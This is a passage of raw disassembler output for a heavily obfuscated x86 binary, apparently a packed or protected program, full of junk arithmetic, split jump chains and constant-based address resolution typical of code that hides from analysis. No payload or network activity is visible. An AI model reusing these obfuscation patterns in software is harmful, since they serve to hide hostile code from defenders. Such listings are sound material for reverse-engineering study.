; START OF FUNCTION CHUNK FOR sub_439AE7
loc_44B24B: ; CODE XREF: sub_439AE7+981j
jmp loc_44071A
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
loc_44B250: ; CODE XREF: ut7h7i2x:0044BCFAj
js loc_43D8F7
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44B256: ; CODE XREF: sub_4462B0+10221j
jmp loc_45479A
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453790
loc_44B25B: ; CODE XREF: sub_453790-D65Ej
jmp nullsub_550
; END OF FUNCTION CHUNK FOR sub_453790
; ---------------------------------------------------------------------------
loc_44B260: ; CODE XREF: ut7h7i2x:0043D1D7j
jmp locret_45ACA6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_44B265: ; CODE XREF: sub_43E592-1ADEj
jmp nullsub_218
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_44B26A: ; CODE XREF: sub_454B2B-1B30Ej
jmp loc_43A852
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
test ecx, 8AC08C8Dh
jmp loc_43D8EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_44B27A: ; CODE XREF: sub_44DEFF-621Aj
push ecx
mov ecx, ebx
xchg ecx, [esp+0]
push 6D4FE037h
jmp loc_43AE5D
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
loc_44B28A: ; CODE XREF: ut7h7i2x:0043ED83j
sbb eax, 0CB3B44C6h
test esi, 7BA03F9Fh
jmp loc_45550C
; ---------------------------------------------------------------------------
push offset sub_442489
jmp locret_44585D
; ---------------------------------------------------------------------------
or edi, esi
xchg eax, [esi]
jmp sub_448CAA
; ---------------------------------------------------------------------------
loc_44B2AE: ; CODE XREF: ut7h7i2x:00443B3Fj
cmp esi, 0FB46F94Ah
jmp loc_44E1EE
; ---------------------------------------------------------------------------
pushf
jmp loc_43F9C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_44B2C0: ; CODE XREF: sub_43C0DA-27Bj
jmp nullsub_427
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
loc_44B2C5: ; DATA XREF: sub_447CEB:loc_43B0C4o
xchg ebx, [esp]
jmp sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_44B2CD: ; CODE XREF: sub_44F738+B42Cj
jnb loc_457B4A
sbb esi, ebp
test ebp, 9667BB14h
jmp loc_44C54E
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
loc_44B2E0: ; CODE XREF: ut7h7i2x:loc_451BFCj
jz loc_450584
jmp loc_44E41C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44B2EB: ; CODE XREF: sub_44F43B-E0F9j
or eax, 4C2B682Ah
add eax, 0FFBDC68h
sub eax, 0B4789DE7h
xor eax, 25FCB86h
add eax, ebp
push ebx
jmp loc_43D5C3
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_44B30B: ; CODE XREF: sub_459DE7-1343Fj
jz loc_441F69
jmp loc_4585EC
; END OF FUNCTION CHUNK FOR sub_459DE7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_371. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_44B317: ; CODE XREF: sub_439701+1E9E2j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443FC3
loc_44B31C: ; CODE XREF: sub_443FC3:loc_452B44j
jnz loc_4484CC
jmp loc_446F0F
; END OF FUNCTION CHUNK FOR sub_443FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_44B327: ; CODE XREF: sub_452D3D:loc_440D06j
add edx, ebp
add edx, 3F25B04h
mov edx, [edx]
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 100h
jnz loc_459980
jmp loc_44DC31
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
xor eax, ecx
jmp sub_43AE1A
; ---------------------------------------------------------------------------
loc_44B351: ; DATA XREF: ut7h7i2x:0043A891o
shr edx, 3
mov ecx, ds:dword_4487F0
movzx edx, byte ptr [ecx+edx]
and eax, edx
jmp loc_43A732
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C87F
loc_44B365: ; CODE XREF: sub_44C87F-302Bj
add eax, 0DA6D42F4h
loc_44B36B: ; CODE XREF: sub_44C87F:loc_44984Cj
xor eax, 0C777BF2Ch
add eax, 0A71EEB22h
add eax, ebp
add eax, 0E038A9FFh
mov eax, [eax]
jmp loc_4400E9
; END OF FUNCTION CHUNK FOR sub_44C87F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_44B386: ; CODE XREF: sub_44602A:loc_455C60j
mov al, [eax]
jns loc_44F966
call sub_449DC4
loc_44B393: ; CODE XREF: sub_447167+40A5j
jmp loc_449447
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
loc_44B398: ; CODE XREF: ut7h7i2x:004538ADj
jz loc_447808
jmp loc_439BC5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_497. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B3A4: ; CODE XREF: ut7h7i2x:00453FDBj
jmp loc_4575E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44B3A9: ; CODE XREF: sub_43CCC3:loc_445F30j
mov [ebp-104h], eax
mov dword ptr [ebp-100h], 276E6143h
mov dword ptr [ebp-0FCh], 6F6C2074h
mov dword ptr [ebp-0F8h], 206461h
jmp loc_451836
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_44B3D2: ; CODE XREF: sub_449D3B+1j
mov ebp, esp
push ecx
mov [ebp-4], eax
mov eax, [ebp-4]
loc_44B3DB: ; CODE XREF: ut7h7i2x:loc_43A8F4j
mov al, [eax]
jb loc_443100
loc_44B3E3: ; CODE XREF: ut7h7i2x:loc_43900Aj
sub al, 99h
jmp loc_44242A
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
mov ecx, edi
jmp loc_44B729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_44B3F1: ; CODE XREF: sub_45A32D-DFE7j
sbb edi, 0F6813175h
loc_44B3F7: ; CODE XREF: sub_45A32D:loc_44846Aj
push 0FF427077h
pop eax
sub eax, 0AF66BD98h
add eax, 0FBFBB075h
xor eax, 553C93E6h
or eax, 7EA3F17Ch
jmp loc_44B425
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_44B41A: ; CODE XREF: sub_449700-740Ej
add ebx, 8048C8E4h
loc_44B420: ; CODE XREF: sub_443A45:loc_43B46Dj
; sub_443A45-47CBj ...
call sub_4408C2
loc_44B425: ; CODE XREF: sub_45A32D-EF18j
add eax, 0C529108Fh
add eax, ebp
add eax, 0BBEAFD6Fh
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jmp loc_443A83
; END OF FUNCTION CHUNK FOR sub_449700
; =============== S U B R O U T I N E =======================================
sub_44B43D proc near ; CODE XREF: ut7h7i2x:00444472j
; sub_457541:loc_458DACp
; FUNCTION CHUNK AT 0043B3FA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043D8B3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440220 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044815B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455922 SIZE 00000016 BYTES
xchg edx, [esp+0]
pop edx
call sub_4587DD
push 4B7EC53Dh
jmp loc_44815B
sub_44B43D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44B450: ; CODE XREF: ut7h7i2x:00444A31j
sbb edx, eax
; =============== S U B R O U T I N E =======================================
sub_44B452 proc near ; CODE XREF: sub_444374:loc_4552B9p
; FUNCTION CHUNK AT 0043BFF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448641 SIZE 00000007 BYTES
xchg esi, [esp+0]
pop esi
rol eax, 1Bh
jmp loc_43BFF1
sub_44B452 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44B45E proc near ; CODE XREF: sub_442B3B:loc_442BEAp
; ut7h7i2x:0045247Dj
; FUNCTION CHUNK AT 0043D5F1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043DE56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004438EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044592D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446F48 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448367 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F421 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453AFF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453E81 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458943 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A508 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43DE56
jmp loc_448156
sub_44B45E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_44B471: ; CODE XREF: sub_45967C-4AD9j
jz loc_44CD53
jmp loc_43ABB0
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_44B47C: ; CODE XREF: sub_457541:loc_458DB1j
and eax, 0D7A245E9h
sub eax, 5E02825Fh
add eax, 72400FAh
mov eax, [eax]
xchg eax, [esp-8+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B6D
loc_44B494: ; CODE XREF: sub_456B6D+16j
jmp loc_44A8CE
; END OF FUNCTION CHUNK FOR sub_456B6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_44B499: ; CODE XREF: sub_43CCC3:loc_444C0Fj
; sub_44B5CF:loc_44B5E1j
push esi
jmp loc_44E922
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
loc_44B49F: ; CODE XREF: ut7h7i2x:004550A0j
rol ecx, 1Ah
jmp loc_456678
; ---------------------------------------------------------------------------
loc_44B4A7: ; CODE XREF: ut7h7i2x:loc_4427FBj
push ebx
push 1CF93637h
pop ebx
or ebx, 0C807D133h
add ebx, 0D5F52442h
and ebx, 4A17F770h
jmp loc_43A786
; ---------------------------------------------------------------------------
loc_44B4C5: ; DATA XREF: sub_43FF65+DF2Co
neg eax
sbb eax, eax
neg eax
mov [ebp-5], al
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44B4CE: ; CODE XREF: sub_450EFA-EAFFj
; sub_444EAA+546Aj ...
jns loc_44BCB0
cmp byte ptr [ebp-5], 0
jnz loc_456C0D
jmp loc_44D351
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44B4E3: ; CODE XREF: sub_439BD1:loc_458F6Cj
; sub_44947D:loc_45999Dj
add edi, 4C7D80C3h
mov [edi], eax
pop edi
call sub_443B9F
; END OF FUNCTION CHUNK FOR sub_439BD1
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44B4F1: ; CODE XREF: sub_447CBE:loc_445650j
mov byte ptr [eax], 0C3h
jmp nullsub_123
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_44B4F9: ; CODE XREF: ut7h7i2x:00445338j
mov eax, [esp]
push edx
call sub_441EC6
mov eax, 9DD7AB44h
push esi
jmp loc_44C32F
; =============== S U B R O U T I N E =======================================
sub_44B50D proc near ; CODE XREF: ut7h7i2x:00441E4Ep
; ut7h7i2x:0045582Ej
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BA6A SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
xchg ecx, [esp-4+arg_0]
jmp loc_43BA6A
sub_44B50D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44B519: ; CODE XREF: sub_455060:loc_43B59Ej
; sub_457A66:loc_442C17j ...
jmp loc_44D52A
; ---------------------------------------------------------------------------
loc_44B51E: ; CODE XREF: sub_455060-9FDDj
; sub_457A66-721Bj
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_44B521: ; CODE XREF: sub_445AD1-C450j
; ut7h7i2x:00443843j
jmp loc_4535B0
; END OF FUNCTION CHUNK FOR sub_445AD1
; =============== S U B R O U T I N E =======================================
sub_44B526 proc near ; CODE XREF: sub_445B07+B702p
; ut7h7i2x:00457B37j
; FUNCTION CHUNK AT 0043F4A1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004411EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457A1F SIZE 0000001F BYTES
xchg edx, [esp+0]
pop edx
loc_44B52A: ; CODE XREF: ut7h7i2x:loc_439A7Fj
call nullsub_19
loc_44B52F: ; CODE XREF: sub_446073:loc_43B626j
; sub_44CBC2-1019Aj
jnb loc_457A1F
xor eax, eax
mov [ebp-0Ch], eax
jmp loc_43F4A1
sub_44B526 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44978D
loc_44B53F: ; CODE XREF: sub_44978Dj
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
mov eax, [esp-4+arg_0]
push edx
call sub_445F20
loc_44B54E: ; CODE XREF: sub_450A48+8j
jmp nullsub_80
; END OF FUNCTION CHUNK FOR sub_44978D
; ---------------------------------------------------------------------------
loc_44B553: ; CODE XREF: ut7h7i2x:0044DC59j
jz loc_43BC4A
jmp loc_4499C3
; ---------------------------------------------------------------------------
adc eax, 7F196A37h
xchg edi, edx
jmp sub_43ABBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_44B56B: ; CODE XREF: sub_43CA2D:loc_44EE1Ej
add eax, 8850630h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_443D17
jmp loc_446236
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
xchg esi, ecx
jmp loc_459839
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B589: ; CODE XREF: ut7h7i2x:0044F679j
jo loc_44C840
; =============== S U B R O U T I N E =======================================
sub_44B58F proc near ; CODE XREF: ut7h7i2x:00451D18p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
mov eax, [esp-4+arg_0]
push offset sub_44879B
jmp nullsub_558
sub_44B58F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_341. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_44B5A1: ; CODE XREF: sub_440944+66C7j
jmp nullsub_83
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_44B5A6: ; CODE XREF: sub_43A0C7:loc_442967j
jmp loc_439B8C
; END OF FUNCTION CHUNK FOR sub_43A0C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44B5AB: ; CODE XREF: sub_43DBEC+48CFj
or edx, 0B995A661h
add ebp, 0C8E7988Ch
loc_44B5B7: ; CODE XREF: sub_43DBEC:loc_43B5C8j
push edx
push 3CCD3F52h
pop edx
xor edx, 0F150B317h
and edx, 80BF314Eh
jmp loc_450785
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44B5CF proc near ; CODE XREF: sub_43C0AF:loc_43C0BCj
; sub_43D364+8p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043DB3E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043F921 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440F71 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004417D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004440BF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00445A79 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447482 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A45E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044B499 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B859 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E922 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F990 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004507CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450FD0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451D3C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452A1A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004545CF SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004549B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454FC3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455BA2 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00455CCD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455E9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045631D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004579FE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459E23 SIZE 00000006 BYTES
push ebp
mov ebp, eax
xchg ebp, [esp+0]
mov eax, ebp
xchg eax, [esp+0]
mov ebp, esp
call sub_439B67
loc_44B5E1: ; CODE XREF: sub_43F9C6+7D2Bj
jmp loc_44B499
sub_44B5CF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449406
loc_44B5E6: ; CODE XREF: sub_449406:loc_4548F3j
and edx, 0DBE7D6C1h
sub edx, 3839188Fh
add edx, 65B9A842h
mov [edx], eax
jmp loc_4485C4
; END OF FUNCTION CHUNK FOR sub_449406
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44B5FF: ; CODE XREF: sub_43AA94:loc_43F44Bj
mov eax, 0E211C416h
call sub_45854D
mov ds:off_41D208, eax
lea eax, sub_44F22A
call sub_452C5A
loc_44B61A: ; CODE XREF: sub_454C15+6j
jmp loc_447248
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_44B61F: ; CODE XREF: ut7h7i2x:004579B7j
add ebx, ebp
add ebx, 49A2D1CBh
mov [ebx], edx
pop ebx
mov eax, [ebp-0Ch]
push 5B9E98BFh
pop ecx
and ecx, 0F75611F2h
jmp loc_43ED2A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44B63F: ; CODE XREF: sub_43A556+1071Aj
jmp loc_44D8F3
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446215
loc_44B644: ; CODE XREF: sub_446215+6j
jmp loc_44080E
; END OF FUNCTION CHUNK FOR sub_446215
; ---------------------------------------------------------------------------
loc_44B649: ; CODE XREF: ut7h7i2x:00457336j
xchg ebx, [esp]
pop ebx
push ecx
mov ecx, [esp+10h]
mov dword ptr [ecx], 10001h
lea eax, sub_45A6A5
jmp loc_44EB4E
; ---------------------------------------------------------------------------
loc_44B663: ; CODE XREF: ut7h7i2x:0044E34Fj
sub edi, 8176EEDFh
loc_44B669: ; CODE XREF: ut7h7i2x:loc_44E33Ej
or ecx, 7B8E553Eh
add ecx, 302A06h
add eax, ecx
jmp loc_448082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_44B67C: ; CODE XREF: sub_43ADDB:loc_452421j
add eax, 0E83FE9A5h
add eax, ebp
push esi
push 50956CC2h
jmp loc_44627B
; END OF FUNCTION CHUNK FOR sub_43ADDB
; =============== S U B R O U T I N E =======================================
sub_44B68F proc near ; CODE XREF: ut7h7i2x:00443FD7j
; sub_44B789-D40p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004392F1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00439E05 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043BDB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DCEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044572F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004468A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D297 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004505EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453039 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004556C0 SIZE 00000009 BYTES
xchg esi, [esp+4+var_4]
pop esi
or eax, eax
jnz loc_4556C0
loc_44B69B: ; CODE XREF: ut7h7i2x:loc_439851j
jmp loc_4468A1
sub_44B68F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_44B6A0: ; CODE XREF: sub_44C8F3:loc_450BDAj
jz loc_456DEA
jmp loc_4505F9
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441C8F
loc_44B6AB: ; CODE XREF: sub_4474B1-6BFBj
; sub_441C8F+E2BEj
mov eax, [ebp-4]
call sub_43B979
loc_44B6B3: ; CODE XREF: sub_44F57E+7068j
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_441C8F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_44B6B8: ; CODE XREF: sub_44FC60-147AAj
push 4
push ecx
push 84396134h
pop ecx
and ecx, 5B9A479Fh
xor ecx, 18413Ch
xchg ecx, [esp+8+var_8]
jmp loc_4470D1
; END OF FUNCTION CHUNK FOR sub_44FC60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_439. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458389
loc_44B6D6: ; CODE XREF: sub_458389+16j
jmp loc_455073
; END OF FUNCTION CHUNK FOR sub_458389
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454A2B
loc_44B6DB: ; CODE XREF: sub_454A2B+7j
jmp loc_4486FE
; END OF FUNCTION CHUNK FOR sub_454A2B
; ---------------------------------------------------------------------------
loc_44B6E0: ; CODE XREF: ut7h7i2x:004429D3j
mov eax, [esp]
push edx
push eax
push 0D30F14Ah
pop eax
add eax, 0B292276Fh
xor eax, 0F0D81D80h
add eax, 0B12A9503h
jmp loc_44A9FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_44B702: ; CODE XREF: ut7h7i2x:00449890j
; sub_457A0D-46ECj
add edx, 90719A01h
xchg edx, [esp+0]
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_457A0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459935
loc_44B710: ; CODE XREF: sub_459935-13CC8j
jl loc_442D24
; END OF FUNCTION CHUNK FOR sub_459935
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44B716: ; CODE XREF: sub_43A556+1C960j
jmp nullsub_276
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_44B71B: ; CODE XREF: ut7h7i2x:0043B460j
jmp nullsub_318
; ---------------------------------------------------------------------------
add ebp, edi
cmp esi, ecx
jmp loc_44D610
; ---------------------------------------------------------------------------
loc_44B729: ; CODE XREF: ut7h7i2x:0044B3ECj
or esi, 9BA871Bh
; =============== S U B R O U T I N E =======================================
sub_44B72F proc near ; CODE XREF: sub_456CBD-1530Fp
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C3FB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043CC44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F77F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446468 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044AAE4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E4E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ED03 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FD03 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004528BB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454A71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004598CF SIZE 00000011 BYTES
xchg esi, [esp+4+var_4]
pop esi
call sub_43D797
loc_44B738: ; CODE XREF: sub_456CBD-ADFj
push 7BD6918Eh
pop eax
sub eax, 4B77C295h
jmp loc_4528BB
sub_44B72F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F9A1
loc_44B749: ; CODE XREF: sub_44F9A1+22j
call sub_444851
loc_44B74E: ; CODE XREF: sub_450DB3-12971j
jmp loc_43DEDF
; END OF FUNCTION CHUNK FOR sub_44F9A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_44B753: ; CODE XREF: sub_44C791:loc_4472FDj
adc edx, eax
sbb esi, 0BD174E1Bh
jmp loc_440B44
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
jbe loc_452A9F
jmp loc_44E8DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44B76B: ; CODE XREF: sub_449E96+B656j
add eax, 0E81D69CDh
add eax, ebp
add eax, 95DA154Ah
mov eax, [eax]
mov byte ptr [eax], 64h
inc dword ptr [ebp-28h]
mov eax, [ebp-28h]
jmp loc_44D1B4
; END OF FUNCTION CHUNK FOR sub_449E96
; =============== S U B R O U T I N E =======================================
sub_44B789 proc near ; CODE XREF: sub_44C5D9+9p
; ut7h7i2x:0045856Ej
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B207 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F5F5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044079B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044121E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004422A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444FBF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044AA43 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BC01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DDFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004505BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450F96 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00454BD6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045649C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00457FAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A99C SIZE 0000000B BYTES
xchg ebx, [esp+4+var_4]
pop ebx
xchg ebx, [esp+0]
mov esi, ebx
pop ebx
jmp loc_43F5F5
sub_44B789 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440E5F
loc_44B798: ; CODE XREF: sub_440E5F:loc_44EFEFj
push edx
call sub_4508DB
mov eax, 26F528F2h
call sub_43AA94
mov ds:off_41D118, eax
jmp loc_4476C2
; END OF FUNCTION CHUNK FOR sub_440E5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B58
loc_44B7B3: ; CODE XREF: sub_439B58:loc_44F661j
xchg edi, [esp+0]
call sub_44D998
push offset loc_442A69
jmp loc_43CEE3
; END OF FUNCTION CHUNK FOR sub_439B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
